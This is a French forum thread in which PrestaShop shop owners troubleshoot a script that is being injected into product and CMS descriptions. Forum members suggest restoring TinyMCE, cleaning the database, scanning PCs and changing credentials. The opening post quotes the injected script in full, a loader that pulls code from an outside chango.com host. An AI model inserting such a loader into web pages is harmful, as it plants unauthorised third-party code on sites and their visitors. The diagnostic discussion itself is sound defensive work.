Injection de code

[fureteur]

Bonjour,

 

Je viens de m'apercevoir qu'un de mes sistes, sous Prestshop 1.4.8.2 contient du code "en plus". je pense par une injection de code car en copiant le google dans la recherche de google, les résultats donne beaucoup de réponses...

 

<script id="__changoScript" type="text/javascript">// <![CDATA[

var __chd__ = {'aid':11079,'chaid':'www_objectify_ca'};(function() { var c = document.createElement('script'); c.type = 'text/javascript'; c.async = true;c.src = ( 'https:' == document.location.protocol ? 'https://z': 'http://p') + '.chango.com/static/c.js'; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(c, s);})();

// ]]></script>

 

Quelqu'un a déjà rencontré ce soucis ? Pour le moment, je n'ai pas encore trouvé l'origine. Une aide pour désinfecter ?

une url par exemple : http://www.piese-mz.net/171-contact-mz-rt-125.html

 

En faisant affichage source, on a le code signalé ci-dessus :

 

Ce script apparaît dans l'éditeur html de la description courte de la fiche produit. Je vais vérifier si je le trouve ailleurs...

Edited July 18, 2012 by fureteur (see edit history)

[coeos.pro]

une url peut être ?

[fureteur]

Je viens de mettre une url comme exemple.

 

une url peut être ?

[coeos.pro]

ok, en fait ça apparait sur les descriptions courtes et longues, soit c'est un module qui a rajouté ça (je ne pense pas), soit ça viens du tinyMCE, si tu accès facilement à ta bdd vérifie les descriptions courtes et longues pour voir si elles contiennes ce code.

Si oui alors il faudra effacer tinyMCE et en remettre une version "saine"

 

tu as rajouté des modules ?

Edited July 18, 2012 by coeos.pro (see edit history)

[fureteur]

Je n'ai ajouté aucun module extérieur, ni modifié Prestashop. j'utilise la version standart. J'ai fait une recherche dans tout le site pour voir s'il trouve le code. Rien.

 

Aucun fichier modifié. J'ai cru comprendre qu'il s'agirait d'un injection directe extérieure. De nombreux sites sont touchés : Wordpress, Forums, etc... Je continue mon enquête.

 

ok, en fait ça apparait sur les descriptions courtes et longues, soit c'est un module qui a rajouté ça (je ne pense pas), soit ça viens du tinyMCE, si tu accès facilement à ta bdd vérifie les descriptions courtes et longues pour voir si elles contiennes ce code.

Si oui alors il faudra effacer tinyMCE et en remettre une version "saine"

 

tu as rajouté des modules ?

[coeos.pro]

ton fichier tpl est clean, peux tu vérifier pour es descriptions courtes et longues dans la bdd

 

as tu autre chose (joomla, wordpress...)

[fureteur]

Table ps product lang nettoyée. Apparemment, le problème est apparu seulement avec les derniers produits saisis aujourd'hui. J'espère que cela ne va pas perdurer.

Edited July 18, 2012 by fureteur (see edit history)

[fureteur]

Seul Prestashop est installé. Pas Joomla, Wordpress ou autre application / script.

 

ton fichier tpl est clean, peux tu vérifier pour es descriptions courtes et longues dans la bdd

 

as tu autre chose (joomla, wordpress...)

[coeos.pro]

Table ps product lang nettoyée. Apparemment, le problème est apparu seulement avec les derniers produits saisis aujourd'hui. J'espère que cela ne va pas perdurer.

si tu enregistres un nouveau produit (test) tu as le même code supplémentaire ? et ce code tu le retrouve dans la bdd pour la description courte et longue c'est bien ça ?

[fureteur]

Oui, tout à fait exact. Tu as trouvé le pourquoi du comment ?

 

si tu enregistres un nouveau produit (test) tu as le même code supplémentaire ? et ce code tu le retrouve dans la bdd pour la description courte et longue c'est bien ça ?

[Hedrad]

Il se trouve également en bdd dans les champs de description des pages CMS ?

[fureteur]

Oui, tout à fait.

 

Il se trouve également en bdd dans les champs de description des pages CMS ?

[Hedrad]

Je vous invite à remettre le dossier d'origine "./js/tiny_mce" et vérifier si le problème est toujours là.

[coeos.pro]

à mon avis ça proviens de tinymce qui est vérolé,

tu as téléchargé ta version de prestashop où ?

tu as données les accès FTP à quelqu'un ?

tu as donnés accès au back office à quelqu'un ?

[fureteur]

Non, je suis le seul à gérer ce site à tous niveaux : hébergement et mise en ligne. Pour l'ajout de produit, oui une personne à un accès.

 

tu as téléchargé ta version de prestashop où ?

->Prestashop a été téléchargé à partir de Prestashop

 

tu as données les accès FTP à quelqu'un ?

-> Non

 

tu as donnés accès au back office à quelqu'un ?

-> oui, un autre profil employé.

 

à mon avis ça proviens de tinymce qui est vérolé,

tu as téléchargé ta version de prestashop où ?

tu as données les accès FTP à quelqu'un ?

tu as donnés accès au back office à quelqu'un ?

[coeos.pro]

a t il (ou toi) installé un module qu'il aurait ensuite désinstallé ?

Si vous n'avez strictement rien installé d'autre que prestashop et sans module extérieur, je ne vois qu'une solution : un de vos ordinateurs est vérolé, a récoltés les identifiants de connexion FTP de filezilla(ou autre) et a ensuite modifié tinymce.

 

Remet tinymce de prestashop pour être sure que c'est bien l'origine du problème

passe les ordi à l'antivirus

modifie les codes d'accès

[fureteur]

Ok, je vais faire tout ça. Je vous tiens au courant du résultat.

 

a t il (ou toi) installé un module qu'il aurait ensuite désinstallé ?

Si vous n'avez strictement rien installé d'autre que prestashop et sans module extérieur, je ne vois qu'une solution : un de vos ordinateurs est vérolé, a récoltés les identifiants de connexion FTP de filezilla(ou autre) et a ensuite modifié tinymce.

 

Remet tinymce de prestashop pour être sure que c'est bien l'origine du problème

passe les ordi à l'antivirus

modifie les codes d'accès

[eljouarz]

J'ai exactement le même problème, ce script se rajoute dans tous les champs, et me rajoute donc des // en front end. J'ai également un module de touché (advanced top menu).

 

Je retrouve biensûr le script dans la bdd.

 

Je n'ose plus entrer dans une application pour le moment. Je n'ai rajouté que de modules venant de Addons.

 

Je remplace en ce moment le dossier Tiny_mce. je vous tiens au courant.

 

eljouarz

[fureteur]

Apparement, il s'agit d'une infection PC, choppé je ne sais comment. En fait dans la barre de statut, lorsqu'on va sur une page ou un site, on voit que quelque chose se charge quelques dixièmes de secondes : changoScript , donc des infos sont envoyées. Je ne connais pas la finalité et ou se trouve ce backdoor, mailware ou virus.... J'ai désintallé Firefox, là je suis Chrome, et je vois qu'il est toujours là. Et sur le Net, je ne trouve aucune information de sa provenance et du remède.

[eljouarz]

J'ai passé mon ordi à l'anti virus : il est clean.

J'ai mis à jour Firefox

J'ai nettoyé ma bdd.

J'ai remplacé le dossier TinyMCE

J'ai transféré mon site sur son hébergement définitif ainsi que la base de données.

 

Les produits existants sont bien bien-sûr mais si je créé un nouveau produit j'ai à nouveau le script. Y aurait-il un autre dossier à remplacer ?

[coeos.pro]

essaye en remettant le dossier admin d'origine, le dossier classes et controllers,

tu as quoi dans le dossier overrides ?

[eljouarz]

OK.

 

Dans Override j'ai :

Category.php

FrontController.php

Product.php

Search.php

 

Que dois-je faire pour ceux-là ?

[coeos.pro]

vérifie si il ne contiennent pas de code malicieux, en particulier frontcontroller et product

[fureteur]

Désolé pour la petite absence dû au formatga à blanc du PC, j'ai dû y passer par là. quelque soit le navigateur utilisé (Chrome, Firefox ou IE), il y avait transmission de données par ce script backdoor. N'ayant trouver aucun "cleaner" et aucune manipulation à faire, j'ai dû formater mes disques.

 

Voilà. Donc ce n'est pas une faille de prestashop, mais un script qui utilisait les informations saisies pour polluer la base de données lors de saisies en Admin.

 

Ils sont doués les petits gars... Plus de peur que de mal pour l'instant.

 

Maintenant que le pc est propre, je vais faire les changements d'accès et nettoyer à fond la base.

 

En tout cas, merci aux intervenants pour leur écoute !!!

Edited July 19, 2012 by fureteur (see edit history)

[eljouarz]

bonjour,

 

J'ai suivi tous les conseils qui m'ont été donnés, et j'en suis au même point :

 

J'ai réinstallé le dossier admin, classes, controller.

 

Pas moyen de trouver la cause de ce script. Toujours ce rajout de ligne.

[coeos.pro]

au pire si ta boutique est nouvelle tu peux tout effacer et tout recommencer (fais juste une sauvegarde de la bdd)

[eljouarz]

Mais ca veut dire que je recommence tout ? mise en page, css, hooks, modules que j'ai rajouté ?

[coeos.pro]

non tu les copies, tu effaces tout tu réinstalles tout, si le problème persiste c'est ça proviens soit de ton ordi, soit des fichiers que tu as copiés